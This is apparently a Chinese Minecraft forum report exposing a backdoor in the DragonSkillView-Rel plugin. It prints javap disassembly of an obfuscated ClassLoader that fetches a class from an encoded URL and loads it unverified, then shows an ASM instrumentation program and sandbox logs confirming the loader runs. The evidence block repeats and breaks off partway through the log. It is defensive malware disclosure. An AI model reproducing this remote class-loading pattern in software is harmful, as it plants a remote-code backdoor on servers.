被举报帖:https://www.mcbbs.net/thread-1447913-1-1.html
相关讨论:https://www.mcbbs.net/forum.php? ... id=1450909#lastpost
证据:
cavenightingale@cavenightingale-CREF-XX:~/malware/zip$ grep ClassLoader -r .
grep: ./seventeen/artist/rel/skillview/main/SkillViewRel/IIiIIiIiiI.class: 匹配到二进制文件
grep: ./seventeen/artist/rel/skillview/main/SkillViewRel/IiiIIIiIIi.class: 匹配到二进制文件
cavenightingale@cavenightingale-CREF-XX:~/malware/zip$ javap -c ./seventeen/artist/rel/skillview/main/SkillViewRel/IiiIIIiIIi.class
Compiled from "fa"
public class seventeen.artist.rel.skillview.main.SkillViewRel.IiiIIIiIIi extends java.lang.ClassLoader {
public seventeen.artist.rel.skillview.main.SkillViewRel.IiiIIIiIIi(java.lang.String);
Code:
0: aload_0
1: invokespecial #16 // Method java/lang/ClassLoader."":()V
4: aload_0
5: new #18 // class java/lang/StringBuilder
8: dup
9: invokespecial #19 // Method java/lang/StringBuilder."":()V
12: iconst_0
13: ldc #21 // String \u001d\u007f\u0001{O$Z
15: invokestatic #27 // Method seventeen/artist/rel/skillview/main/SkillViewRel/IIIIiiIIiI.instanceof:(Ljava/lang/String;)Ljava/lang/String;
18: invokevirtual #31 // Method java/lang/StringBuilder.insert:(ILjava/lang/String;)Ljava/lang/StringBuilder;
21: ldc #33 // String {\u0019~\u0012b\u001bT\u0016c\u0010h\u001e%\u001c{\u0010o\u0012%\u0016d\u0018
23: invokestatic #27 // Method seventeen/artist/rel/skillview/main/SkillViewRel/IIIIiiIIiI.instanceof:(Ljava/lang/String;)Ljava/lang/String;
26: invokestatic #36 // Method seventeen/artist/rel/skillview/main/SkillViewRel/IIiIIiIiiI.IiiiiiiIII:(Ljava/lang/String;)Ljava/lang/String;
29: invokevirtual #40 // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
32: ldc #42 // String O:F8C=Zm\u001cg\u0010xZ
34: invokestatic #27 // Method seventeen/artist/rel/skillview/main/SkillViewRel/IIIIiiIIiI.instanceof:(Ljava/lang/String;)Ljava/lang/String;
37: invokevirtual #40 // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
40: getstatic #45 // Field seventeen/artist/rel/skillview/main/SkillViewRel/IIiIIiIiiI.char:Ljava/lang/String;
43: ldc #47 // String _3&M
45: invokestatic #27 // Method seventeen/artist/rel/skillview/main/SkillViewRel/IIIIiiIIiI.instanceof:(Ljava/lang/String;)Ljava/lang/String;
48: invokestatic #53 // Method java/net/URLEncoder.encode:(Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String;
51: invokevirtual #40 // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
54: ldc #55 // String Z
56: invokestatic #27 // Method seventeen/artist/rel/skillview/main/SkillViewRel/IIIIiiIIiI.instanceof:(Ljava/lang/String;)Ljava/lang/String;
59: invokevirtual #40 // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
62: aload_1
63: invokevirtual #40 // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
66: invokevirtual #59 // Method java/lang/StringBuilder.toString:()Ljava/lang/String;
69: putfield #61 // Field extends:Ljava/lang/String;
72: return
73: athrow
74: astore_2
75: aload_2
76: invokevirtual #64 // Method java/io/UnsupportedEncodingException.printStackTrace:()V
79: return
Exception table:
from to target type
4 72 74 Class java/io/UnsupportedEncodingException
public java.lang.Class findClass(java.lang.String);
Code:
0: new #76 // class java/net/URL
3: dup
4: aload_0
5: getfield #61 // Field extends:Ljava/lang/String;
8: invokespecial #78 // Method java/net/URL."":(Ljava/lang/String;)V
11: dup
12: astore_2
13: invokevirtual #82 // Method java/net/URL.openConnection:()Ljava/net/URLConnection;
16: checkcast #84 // class java/net/HttpURLConnection
19: dup
20: ldc #86 // String
22: invokestatic #27 // Method seventeen/artist/rel/skillview/main/SkillViewRel/IIIIiiIIiI.instanceof:(Ljava/lang/String;)Ljava/lang/String;
25: getstatic #91 // Field seventeen/artist/rel/skillview/main/SkillViewRel/iIiIiIIIIi.iiIIiiiiIi:Ljava/lang/String;
28: invokevirtual #95 // Method java/net/HttpURLConnection.setRequestProperty:(Ljava/lang/String;Ljava/lang/String;)V
31: invokevirtual #99 // Method java/net/HttpURLConnection.getInputStream:()Ljava/io/InputStream;
34: astore_3
35: new #101 // class java/io/ByteArrayOutputStream
38: dup
39: invokespecial #102 // Method java/io/ByteArrayOutputStream."":()V
42: astore 4
44: sipush 1024
47: newarray byte
49: iconst_1
50: dup
51: pop2
52: astore 5
54: iconst_0
55: istore 6
57: aload_3
58: aload 5
60: invokevirtual #108 // Method java/io/InputStream.read:([B)I
63: dup
64: istore 6
66: iconst_m1
67: if_icmpeq 85
70: aload_3
71: aload 4
73: aload 5
75: iconst_0
76: iload 6
78: invokevirtual #112 // Method java/io/ByteArrayOutputStream.write:([BII)V
81: goto 58
84: athrow
85: aload 4
87: invokevirtual #116 // Method java/io/ByteArrayOutputStream.toByteArray:()[B
90: astore 6
92: aload_0
93: aload_1
94: iconst_0
95: aload 6
97: dup_x1
98: arraylength
99: invokevirtual #120 // Method defineClass:(Ljava/lang/String;[BII)Ljava/lang/Class;
102: astore_3
103: aload_3
104: areturn
105: athrow
106: astore_2
107: aconst_null
108: aload_2
109: invokevirtual #121 // Method java/io/IOException.printStackTrace:()V
112: areturn
Exception table:
from to target type
0 84 106 Class java/io/IOException
85 104 106 Class java/io/IOException
}
复制代码
概括:该文件从网上下载Java类并在没有验证的情况下加载了它
为证明该类确实被使用,对该类进行字节码编辑,插入对io.github.cavenightingale.Anchor.onClassLoaded的调用,程序如下:
package io.github.cavenightingale;
import org.objectweb.asm.ClassReader;
import org.objectweb.asm.ClassWriter;
import org.objectweb.asm.Opcodes;
import org.objectweb.asm.tree.*;
import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.io.IOException;
public class Main {
public static void main(String[] args) {
try (var is = new FileInputStream("/home/cavenightingale/malware/zip/seventeen/artist/rel/skillview/main/SkillViewRel/IIiIIiIiiI.class");
var os = new FileOutputStream("/home/cavenightingale/malware/zip/seventeen/artist/rel/skillview/main/SkillViewRel/IIiIIiIiiI.class.1")) {
ClassReader cr = new ClassReader(is);
ClassNode node = new ClassNode();
cr.accept(node, 0);
for (var x : node.methods) {
if (x instanceof MethodNode mn && mn.name.equals("")) {
mn.instructions.insertBefore(mn.instructions.getFirst(), new MethodInsnNode(Opcodes.INVOKESTATIC, "io/github/cavenightingale/Anchor", "onClassLoaded", "()V"));
}
}
ClassWriter cw = new ClassWriter(0);
node.accept(cw);
os.write(cw.toByteArray());
} catch (IOException e) {
throw new RuntimeException(e);
}
}
}复制代码
package io.github.cavenightingale;
public class Anchor {
public static void onClassLoaded() {
System.out.println("[CaveNightingale] Backdoor loaded!");
}
}复制代码
使用IIiIIiIiiI.class.1替换IIiIIiIiiI.class并进行重新打包,丢进隔离环境运行
Starting org.bukkit.craftbukkit.Main
System Info: Java 17 (OpenJDK 64-Bit Server VM 17.0.7+7-Ubuntu-0ubuntu123.04) Host: Linux 6.2.0-23-generic (amd64)
Loading libraries, please wait...
[14:54:58 INFO]: Environment: authHost='https://authserver.mojang.com', accountsHost='https://api.mojang.com', sessionHost='https://sessionserver.mojang.com', servicesHost='https://api.minecraftservices.com', name='PROD'
[14:55:00 INFO]: Loaded 7 recipes
[14:55:00 INFO]: Starting minecraft server version 1.20.1
[14:55:00 INFO]: Loading properties
[14:55:01 INFO]: This server is running Paper version git-Paper-47 (MC: 1.20.1) (Implementing API version 1.20.1-R0.1-SNAPSHOT) (Git: aea9cdd)
[14:55:01 INFO]: Server Ping Player Sample Count: 12
[14:55:01 INFO]: Using 4 threads for Netty based IO
[14:55:01 WARN]: [!] The timings profiler has been enabled but has been scheduled for removal from Paper in the future.
We recommend installing the spark profiler as a replacement: https://spark.lucko.me/
For more information please visit: https://github.com/PaperMC/Paper/issues/8948
[14:55:01 INFO]: [ChunkTaskScheduler] Chunk system is using 1 I/O threads, 4 worker threads, and gen parallelism of 4 threads
[14:55:01 INFO]: Default game type: SURVIVAL
[14:55:01 INFO]: Generating keypair
[14:55:01 INFO]: Starting Minecraft server on *:25565
[14:55:01 INFO]: Using epoll channel type
[14:55:02 INFO]: Paper: Using libdeflate (Linux x86_64) compression from Velocity.
[14:55:02 INFO]: Paper: Using OpenSSL 3.0.x (Linux x86_64) cipher from Velocity.
[14:55:02 WARN]: [org.bukkit.craftbukkit.v1_20_R1.legacy.CraftLegacy] Initializing Legacy Material Support. Unless you have legacy plugins and/or data this is a bug!
[14:55:06 WARN]: Legacy plugin MCCore v1.67 does not specify an api-version.
[14:55:06 WARN]: Legacy plugin DragonCore v2.4.7 does not specify an api-version.
[14:55:06 WARN]: Legacy plugin SkillAPI v3.108 does not specify an api-version.
[14:55:06 WARN]: Legacy plugin DragonSkillView-Rel v2.0.8 does not specify an api-version.
[14:55:06 INFO]: [PlaceholderAPI] Loading server plugin PlaceholderAPI v2.11.3
[14:55:06 INFO]: [MCCore] Loading server plugin MCCore v1.67
[14:55:06 INFO]: [DragonCore] Loading server plugin DragonCore v2.4.7
[14:55:06 INFO]: [SkillAPI] Loading server plugin SkillAPI v3.108
[14:55:06 INFO]: [DragonSkillView-Rel] Loading server plugin DragonSkillView-Rel v2.0.8
[14:55:06 INFO]: Server permissions file permissions.yml is empty, ignoring it
[14:55:06 INFO]: Preparing level "world"
[14:55:07 INFO]: Preparing start region for dimension minecraft:overworld
[14:55:07 INFO]: Time elapsed: 371 ms
[14:55:07 INFO]: Preparing start region for dimension minecraft:the_nether
[14:55:07 INFO]: Time elapsed: 55 ms
[14:55:07 INFO]: Preparing start region for dimension minecraft:the_end
[14:55:07 INFO]: Time elapsed: 59 ms
[14:55:07 INFO]: [PlaceholderAPI] Enabling PlaceholderAPI v2.11.3
[14:55:08 INFO]: [PlaceholderAPI] Fetching available expansion information...
[14:55:08 INFO]: [MCCore] Enabling MCCore v1.67*
[14:55:08 INFO]: [MCCore] [STDOUT] Failed to set up reflection - is the server using Cauldron/Thermos?
[14:55:08 WARN]: Nag author(s): '[Eniripsa96]' of 'MCCore v1.67' about their usage of System.out/err.print. Please use your plugin's logger instead (JavaPlugin#getLogger).
[14:55:08 INFO]: [MCCore] [STDOUT] Failed to set up reflection for scoreboards - restoring to slow method
[14:55:08 INFO]: [MCCore] Created a new folder for config files
[14:55:08 INFO]: [DragonCore] Enabling DragonCore v2.4.7*
[14:55:08 INFO]: ************************************************************
[14:55:08 INFO]: [DragonCore] 欢迎使用【龙之核心】,插件作者为QQ448780139
[14:55:08 INFO]: [DragonCore] 欢迎加入QQ交流群: 901704037
14:55:08 INFO]: [DragonCore] 欢迎注册社区网站: [https://dragoncore.top/
[14:55:08 INFO]: ************************************************************
[14:55:08 INFO]: [DragonCore] [STDOUT] NMS版本:net.minecraft.server.v1_20_R1
[14:55:08 WARN]: Nag author(s): '[]' of 'DragonCore v2.4.7' about their usage of System.out/err.print. Please use your plugin's logger instead (JavaPlugin#getLogger).
[14:55:08 WARN]: java.lang.ClassNotFoundException: net.minecraft.server.v1_20_R1.ItemStack
[14:55:08 WARN]: at org.bukkit.plugin.java.PluginClassLoader.loadClass0(PluginClassLoader.java:183)
[14:55:08 WARN]: at org.bukkit.plugin.java.PluginClassLoader.loadClass(PluginClassLoader.java:150)
[14:55:08 WARN]: at java.base/java.lang.ClassLoader.loadClass(ClassLoader.java:520)
[14:55:08 WARN]: at java.base/java.lang.Class.forName0(Native Method)
[14:55:08 WARN]: at java.base/java.lang.Class.forName(Class.java:375)
[14:55:08 WARN]: at [插件]DragonCore-2.4.7.jar//eos.moe.dragoncore.util.NBTUtils.loadNBTUtils(NBTUtils.java:118)
[14:55:08 WARN]: at [插件]DragonCore-2.4.7.jar//eos.moe.dragoncore.DragonCore.onEnable(DragonCore.java:50)
[14:55:08 WARN]: at org.bukkit.plugin.java.JavaPlugin.setEnabled(JavaPlugin.java:281)
[14:55:08 WARN]: at io.papermc.paper.plugin.manager.PaperPluginInstanceManager.enablePlugin(PaperPluginInstanceManager.java:189)
[14:55:08 WARN]: at io.papermc.paper.plugin.manager.PaperPluginManagerImpl.enablePlugin(PaperPluginManagerImpl.java:104)
[14:55:08 WARN]: at org.bukkit.plugin.SimplePluginManager.enablePlugin(SimplePluginManager.java:507)
[14:55:08 WARN]: at org.bukkit.craftbukkit.v1_20_R1.CraftServer.enablePlugin(CraftServer.java:636)
[14:55:08 WARN]: at org.bukkit.craftbukkit.v1_20_R1.CraftServer.enablePlugins(CraftServer.java:547)
[14:55:08 WARN]: at net.minecraft.server.MinecraftServer.loadWorld0(MinecraftServer.java:636)
[14:55:08 WARN]: at net.minecraft.server.MinecraftServer.loadLevel(MinecraftServer.java:435)
[14:55:08 WARN]: at net.minecraft.server.dedicated.DedicatedServer.e(DedicatedServer.java:308)
[14:55:08 WARN]: at net.minecraft.server.MinecraftServer.w(MinecraftServer.java:1101)
[14:55:08 WARN]: at net.minecraft.server.MinecraftServer.lambda$spin$0(MinecraftServer.java:318)
[14:55:08 WARN]: at java.base/java.lang.Thread.run(Thread.java:833)
[14:55:08 INFO]: DragonCore - 开始载入文件
[14:55:08 INFO]: ┏━━━━━━━━━ 开始载入Yml文件 ━━━━━━━━━
[14:55:08 INFO]: ┃ 载入: WorldTexture.yml
[14:55:08 INFO]: ┃ 载入: SlotConfig.yml
[14:55:09 INFO]: ┃ 载入: KeyConfig.yml
[14:55:09 INFO]: ┃ 载入: ItemModel.yml
[14:55:09 INFO]: ┃ 载入: ItemIcon.yml
[14:55:09 INFO]: ┃ 载入: FontConfig.yml
[14:55:09 INFO]: ┃ 载入: EntityModel.yml
[14:55:09 INFO]: ┃ 载入: config.yml
[14:55:09 INFO]: ┃ 载入: Blood.yml
[14:55:09 INFO]: ┃ 载入: ArmorLayer.yml
[14:55:09 INFO]: ┃ 载入: ItemTip/通用.yml
[14:55:09 INFO]: ┃ 载入: ItemTip/用于显示Gui界面的Tip.yml
[14:55:09 INFO]: ┃ 载入: ItemTip/书本.yml
[14:55:09 INFO]: ┃ 载入: Gui/自动滚动公告.yml
[14:55:09 INFO]: ┃ 载入: Gui/背包.yml
[14:55:09 INFO]: ┃ 载入: Gui/huds.yml
[14:55:09 INFO]: ┖━━━━━━━━━━ 文件载入完成 ━━━━━━━━━━━
[14:55:09 INFO]: 已启用YML格式存储玩家数据
[14:55:09 INFO]: DragonCore - 加载完成
[14:55:09 INFO]: [SkillAPI] Enabling SkillAPI v3.108*
[14:55:09 INFO]: [SkillAPI] Created a new folder for config files
[14:55:09 INFO]: [SkillAPI] Created a new folder for config files
[14:55:09 INFO]: Registration complete
[14:55:09 INFO]: - 0 skills
[14:55:09 INFO]: - 0 classes
[14:55:09 WARN]: java.lang.NullPointerException: Cannot invoke "java.lang.Class.getDeclaredField(String)" because "living" is null
[14:55:09 WARN]: at SkillAPI.jar//com.sucy.skill.listener.KillListener.(KillListener.java:68)
[14:55:09 WARN]: at SkillAPI.jar//com.sucy.skill.SkillAPI.onEnable(SkillAPI.java:162)
[14:55:09 WARN]: at org.bukkit.plugin.java.JavaPlugin.setEnabled(JavaPlugin.java:281)
[14:55:09 WARN]: at io.papermc.paper.plugin.manager.PaperPluginInstanceManager.enablePlugin(PaperPluginInstanceManager.java:189)
[14:55:09 WARN]: at io.papermc.paper.plugin.manager.PaperPluginManagerImpl.enablePlugin(PaperPluginManagerImpl.java:104)
[14:55:09 WARN]: at org.bukkit.plugin.SimplePluginManager.enablePlugin(SimplePluginManager.java:507)
[14:55:09 WARN]: at org.bukkit.craftbukkit.v1_20_R1.CraftServer.enablePlugin(CraftServer.java:636)
[14:55:09 WARN]: at org.bukkit.craftbukkit.v1_20_R1.CraftServer.enablePlugins(CraftServer.java:547)
[14:55:09 WARN]: at net.minecraft.server.MinecraftServer.loadWorld0(MinecraftServer.java:636)
[14:55:09 WARN]: at net.minecraft.server.MinecraftServer.loadLevel(MinecraftServer.java:435)
[14:55:09 WARN]: at net.minecraft.server.dedicated.DedicatedServer.e(DedicatedServer.java:308)
[14:55:09 WARN]: at net.minecraft.server.MinecraftServer.w(MinecraftServer.java:1101)
[14:55:09 WARN]: at net.minecraft.server.MinecraftServer.lambda$spin$0(MinecraftServer.java:318)
[14:55:09 WARN]: at java.base/java.lang.Thread.run(Thread.java:833)
[14:55:09 INFO]: [DragonSkillView-Rel] Enabling DragonSkillView-Rel v2.0.8*
[14:55:09 INFO]: [DragonSkillView-Rel] [STDOUT] [CaveNightingale] Backdoor loaded!
[14:55:09 WARN]: Nag author(s): '[17Artist]' of 'DragonSkillView-Rel v2.0.8' about their usage of System.out/err.print. Please use your plugin's logger instead (JavaPlugin#getLogger).
[14:55:10 INFO]: ┏━━━━━━━━━ 鉴权失败 ━━━━━━━━━
[14:55:10 INFO]: ┃ 失败: 激活码有误,请检查
[14:55:10 INFO]: ┃ 插件名: 龙之技能栏
[14:55:10 INFO]: ┖━━━━━━━━━━ 鉴权失败 ━━━━━━━━━━━
[14:55:10 INFO]: [PlaceholderAPI] Placeholder expansion registration initializing...
[14:55:10 INFO]: Running delayed init tasks
[14:55:10 INFO]: 0 placeholder hook(s) registered!
[14:55:10 INFO]: Done (9.372s)! For help, type "help"
[14:55:10 INFO]: Timings Reset
[14:55:13 INFO]: ┏━━━━━━━━━ 鉴权失败 ━━━━━━━━━
[14:55:13 INFO]: ┃ 失败: 验证失败,请检查激活码,是否填写正确。
[14:55:13 INFO]: ┃ 插件名: 龙之技能栏
[14:55:13 INFO]: ┖━━━━━━━━━━ 鉴权失败 ━━━━━━━━━━━
>
> stop
[14:55:59 INFO]: Stopping the server
[14:55:59 INFO]: Stopping server
[14:55:59 INFO]: [DragonSkillView-Rel] Disabling DragonSkillView-Rel v2.0.8
[14:55:59 INFO]: [SkillAPI] Disabling SkillAPI v3.108
[14:55:59 INFO]: [DragonCore] Disabling DragonCore v2.4.7
[14:55:59 INFO]: [MCCore] Disabling MCCore v1.67
[14:55:59 INFO]: [PlaceholderAPI] Disabling PlaceholderAPI v2.11.3
[14:55:59 INFO]: Saving players
[14:55:59 INFO]: Saving worlds
[14:55:59 INFO]: Saving chunks for level 'ServerLevel[world]'/minecraft:overworld
[14:55:59 INFO]: [ChunkHolderManager] Waiting 60s for chunk system to halt for world 'world'
[14:55:59 INFO]: [ChunkHolderManager] Halted chunk system for world 'world'
[14:55:59 INFO]: [ChunkHolderManager] Saving all chunkholders for world 'world'
[14:56:01 INFO]: [ChunkHolderManager] Saved 529 block chunks, 529 entity chunks, 0 poi chunks in world 'world' in 1.82s
[14:56:01 INFO]: ThreadedAnvilChunkStorage (world): All chunks are saved
[14:56:01 INFO]: Saving chunks for level 'ServerLevel[world_nether]'/minecraft:the_nether
[14:56:01 INFO]: [ChunkHolderManager] Waiting 60s for chunk system to halt for world 'world_nether'
[14:56:01 INFO]: [ChunkHolderManager] Halted chunk system for world 'world_nether'
[14:56:01 INFO]: [ChunkHolderManager] Saving all chunkholders for world 'world_nether'
[14:56:02 INFO]: [ChunkHolderManager] Saved 529 block chunks, 529 entity chunks, 0 poi chunks in world 'world_nether' in 1.01s
[14:56:02 INFO]: ThreadedAnvilChunkStorage (DIM-1): All chunks are saved
[14:56:02 INFO]: Saving chunks for level 'ServerLevel[world_the_end]'/minecraft:the_end
[14:56:02 INFO]: [ChunkHolderManager] Waiting 60s for chunk system to halt for world 'world_the_end'
[14:56:02 INFO]: [ChunkHolderManager] Halted chunk system for world 'world_the_end'
[14:56:02 INFO]: [ChunkHolderManager] Saving all chunkholders for world 'world_the_end'
[14:56:02 INFO]: [ChunkHolderManager] Saved 529 block chunks, 529 entity chunks, 0 poi chunks in world 'world_the_end' in 0.15s
[14:56:02 INFO]: ThreadedAnvilChunkStorage (DIM1): All chunks are saved
[14:56:02 INFO]: ThreadedAnvilChunkStorage: All dimensions are saved
[14:56:02 INFO]: Flushing Chunk IO
[14:56:02 INFO]: Closing Thread Pool
> 2023-06-24 14:56:02,888 Log4j2-AsyncAppenderEventDispatcher-1-Async WARN Advanced terminal features are not available in this environment
[14:56:02 INFO]: Closing Server
证明该类确实在运行过程中被使用
相关讨论:https://www.mcbbs.net/forum.php? ... id=1450909#lastpost
证据:
cavenightingale@cavenightingale-CREF-XX:~/malware/zip$ grep ClassLoader -r .
grep: ./seventeen/artist/rel/skillview/main/SkillViewRel/IIiIIiIiiI.class: 匹配到二进制文件
grep: ./seventeen/artist/rel/skillview/main/SkillViewRel/IiiIIIiIIi.class: 匹配到二进制文件
cavenightingale@cavenightingale-CREF-XX:~/malware/zip$ javap -c ./seventeen/artist/rel/skillview/main/SkillViewRel/IiiIIIiIIi.class
Compiled from "fa"
public class seventeen.artist.rel.skillview.main.SkillViewRel.IiiIIIiIIi extends java.lang.ClassLoader {
public seventeen.artist.rel.skillview.main.SkillViewRel.IiiIIIiIIi(java.lang.String);
Code:
0: aload_0
1: invokespecial #16 // Method java/lang/ClassLoader."":()V
4: aload_0
5: new #18 // class java/lang/StringBuilder
8: dup
9: invokespecial #19 // Method java/lang/StringBuilder."":()V
12: iconst_0
13: ldc #21 // String \u001d\u007f\u0001{O$Z
15: invokestatic #27 // Method seventeen/artist/rel/skillview/main/SkillViewRel/IIIIiiIIiI.instanceof:(Ljava/lang/String;)Ljava/lang/String;
18: invokevirtual #31 // Method java/lang/StringBuilder.insert:(ILjava/lang/String;)Ljava/lang/StringBuilder;
21: ldc #33 // String {\u0019~\u0012b\u001bT\u0016c\u0010h\u001e%\u001c{\u0010o\u0012%\u0016d\u0018
23: invokestatic #27 // Method seventeen/artist/rel/skillview/main/SkillViewRel/IIIIiiIIiI.instanceof:(Ljava/lang/String;)Ljava/lang/String;
26: invokestatic #36 // Method seventeen/artist/rel/skillview/main/SkillViewRel/IIiIIiIiiI.IiiiiiiIII:(Ljava/lang/String;)Ljava/lang/String;
29: invokevirtual #40 // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
32: ldc #42 // String O:F8C=Zm\u001cg\u0010xZ
34: invokestatic #27 // Method seventeen/artist/rel/skillview/main/SkillViewRel/IIIIiiIIiI.instanceof:(Ljava/lang/String;)Ljava/lang/String;
37: invokevirtual #40 // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
40: getstatic #45 // Field seventeen/artist/rel/skillview/main/SkillViewRel/IIiIIiIiiI.char:Ljava/lang/String;
43: ldc #47 // String _3&M
45: invokestatic #27 // Method seventeen/artist/rel/skillview/main/SkillViewRel/IIIIiiIIiI.instanceof:(Ljava/lang/String;)Ljava/lang/String;
48: invokestatic #53 // Method java/net/URLEncoder.encode:(Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String;
51: invokevirtual #40 // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
54: ldc #55 // String Z
56: invokestatic #27 // Method seventeen/artist/rel/skillview/main/SkillViewRel/IIIIiiIIiI.instanceof:(Ljava/lang/String;)Ljava/lang/String;
59: invokevirtual #40 // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
62: aload_1
63: invokevirtual #40 // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
66: invokevirtual #59 // Method java/lang/StringBuilder.toString:()Ljava/lang/String;
69: putfield #61 // Field extends:Ljava/lang/String;
72: return
73: athrow
74: astore_2
75: aload_2
76: invokevirtual #64 // Method java/io/UnsupportedEncodingException.printStackTrace:()V
79: return
Exception table:
from to target type
4 72 74 Class java/io/UnsupportedEncodingException
public java.lang.Class findClass(java.lang.String);
Code:
0: new #76 // class java/net/URL
3: dup
4: aload_0
5: getfield #61 // Field extends:Ljava/lang/String;
8: invokespecial #78 // Method java/net/URL."":(Ljava/lang/String;)V
11: dup
12: astore_2
13: invokevirtual #82 // Method java/net/URL.openConnection:()Ljava/net/URLConnection;
16: checkcast #84 // class java/net/HttpURLConnection
19: dup
20: ldc #86 // String
22: invokestatic #27 // Method seventeen/artist/rel/skillview/main/SkillViewRel/IIIIiiIIiI.instanceof:(Ljava/lang/String;)Ljava/lang/String;
25: getstatic #91 // Field seventeen/artist/rel/skillview/main/SkillViewRel/iIiIiIIIIi.iiIIiiiiIi:Ljava/lang/String;
28: invokevirtual #95 // Method java/net/HttpURLConnection.setRequestProperty:(Ljava/lang/String;Ljava/lang/String;)V
31: invokevirtual #99 // Method java/net/HttpURLConnection.getInputStream:()Ljava/io/InputStream;
34: astore_3
35: new #101 // class java/io/ByteArrayOutputStream
38: dup
39: invokespecial #102 // Method java/io/ByteArrayOutputStream."":()V
42: astore 4
44: sipush 1024
47: newarray byte
49: iconst_1
50: dup
51: pop2
52: astore 5
54: iconst_0
55: istore 6
57: aload_3
58: aload 5
60: invokevirtual #108 // Method java/io/InputStream.read:([B)I
63: dup
64: istore 6
66: iconst_m1
67: if_icmpeq 85
70: aload_3
71: aload 4
73: aload 5
75: iconst_0
76: iload 6
78: invokevirtual #112 // Method java/io/ByteArrayOutputStream.write:([BII)V
81: goto 58
84: athrow
85: aload 4
87: invokevirtual #116 // Method java/io/ByteArrayOutputStream.toByteArray:()[B
90: astore 6
92: aload_0
93: aload_1
94: iconst_0
95: aload 6
97: dup_x1
98: arraylength
99: invokevirtual #120 // Method defineClass:(Ljava/lang/String;[BII)Ljava/lang/Class;
102: astore_3
103: aload_3
104: areturn
105: athrow
106: astore_2
107: aconst_null
108: aload_2
109: invokevirtual #121 // Method java/io/IOException.printStackTrace:()V
112: areturn
Exception table:
from to target type
0 84 106 Class java/io/IOException
85 104 106 Class java/io/IOException
}
复制代码
概括:该文件从网上下载Java类并在没有验证的情况下加载了它
为证明该类确实被使用,对该类进行字节码编辑,插入对io.github.cavenightingale.Anchor.onClassLoaded的调用,程序如下:
package io.github.cavenightingale;
import org.objectweb.asm.ClassReader;
import org.objectweb.asm.ClassWriter;
import org.objectweb.asm.Opcodes;
import org.objectweb.asm.tree.*;
import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.io.IOException;
public class Main {
public static void main(String[] args) {
try (var is = new FileInputStream("/home/cavenightingale/malware/zip/seventeen/artist/rel/skillview/main/SkillViewRel/IIiIIiIiiI.class");
var os = new FileOutputStream("/home/cavenightingale/malware/zip/seventeen/artist/rel/skillview/main/SkillViewRel/IIiIIiIiiI.class.1")) {
ClassReader cr = new ClassReader(is);
ClassNode node = new ClassNode();
cr.accept(node, 0);
for (var x : node.methods) {
if (x instanceof MethodNode mn && mn.name.equals("")) {
mn.instructions.insertBefore(mn.instructions.getFirst(), new MethodInsnNode(Opcodes.INVOKESTATIC, "io/github/cavenightingale/Anchor", "onClassLoaded", "()V"));
}
}
ClassWriter cw = new ClassWriter(0);
node.accept(cw);
os.write(cw.toByteArray());
} catch (IOException e) {
throw new RuntimeException(e);
}
}
}复制代码
package io.github.cavenightingale;
public class Anchor {
public static void onClassLoaded() {
System.out.println("[CaveNightingale] Backdoor loaded!");
}
}复制代码
使用IIiIIiIiiI.class.1替换IIiIIiIiiI.class并进行重新打包,丢进隔离环境运行
Starting org.bukkit.craftbukkit.Main
System Info: Java 17 (OpenJDK 64-Bit Server VM 17.0.7+7-Ubuntu-0ubuntu123.04) Host: Linux 6.2.0-23-generic (amd64)
Loading libraries, please wait...
[14:54:58 INFO]: Environment: authHost='https://authserver.mojang.com', accountsHost='https://api.mojang.com', sessionHost='https://sessionserver.mojang.com', servicesHost='https://api.minecraftservices.com', name='PROD'
[14:55:00 INFO]: Loaded 7 recipes
[14:55:00 INFO]: Starting minecraft server version 1.20.1
[14:55:00 INFO]: Loading properties
[14:55:01 INFO]: This server is running Paper version git-Paper-47 (MC: 1.20.1) (Implementing API version 1.20.1-R0.1-SNAPSHOT) (Git: aea9cdd)
[14:55:01 INFO]: Server Ping Player Sample Count: 12
[14:55:01 INFO]: Using 4 threads for Netty based IO
[14:55:01 WARN]: [!] The timings profiler has been enabled but has been scheduled for removal from Paper in the future.
We recommend installing the spark profiler as a replacement: https://spark.lucko.me/
For more information please visit: https://github.com/PaperMC/Paper/issues/8948
[14:55:01 INFO]: [ChunkTaskScheduler] Chunk system is using 1 I/O threads, 4 worker threads, and gen parallelism of 4 threads
[14:55:01 INFO]: Default game type: SURVIVAL
[14:55:01 INFO]: Generating keypair
[14:55:01 INFO]: Starting Minecraft server on *:25565
[14:55:01 INFO]: Using epoll channel type
[14:55:02 INFO]: Paper: Using libdeflate (Linux x86_64) compression from Velocity.
[14:55:02 INFO]: Paper: Using OpenSSL 3.0.x (Linux x86_64) cipher from Velocity.
[14:55:02 WARN]: [org.bukkit.craftbukkit.v1_20_R1.legacy.CraftLegacy] Initializing Legacy Material Support. Unless you have legacy plugins and/or data this is a bug!
[14:55:06 WARN]: Legacy plugin MCCore v1.67 does not specify an api-version.
[14:55:06 WARN]: Legacy plugin DragonCore v2.4.7 does not specify an api-version.
[14:55:06 WARN]: Legacy plugin SkillAPI v3.108 does not specify an api-version.
[14:55:06 WARN]: Legacy plugin DragonSkillView-Rel v2.0.8 does not specify an api-version.
[14:55:06 INFO]: [PlaceholderAPI] Loading server plugin PlaceholderAPI v2.11.3
[14:55:06 INFO]: [MCCore] Loading server plugin MCCore v1.67
[14:55:06 INFO]: [DragonCore] Loading server plugin DragonCore v2.4.7
[14:55:06 INFO]: [SkillAPI] Loading server plugin SkillAPI v3.108
[14:55:06 INFO]: [DragonSkillView-Rel] Loading server plugin DragonSkillView-Rel v2.0.8
[14:55:06 INFO]: Server permissions file permissions.yml is empty, ignoring it
[14:55:06 INFO]: Preparing level "world"
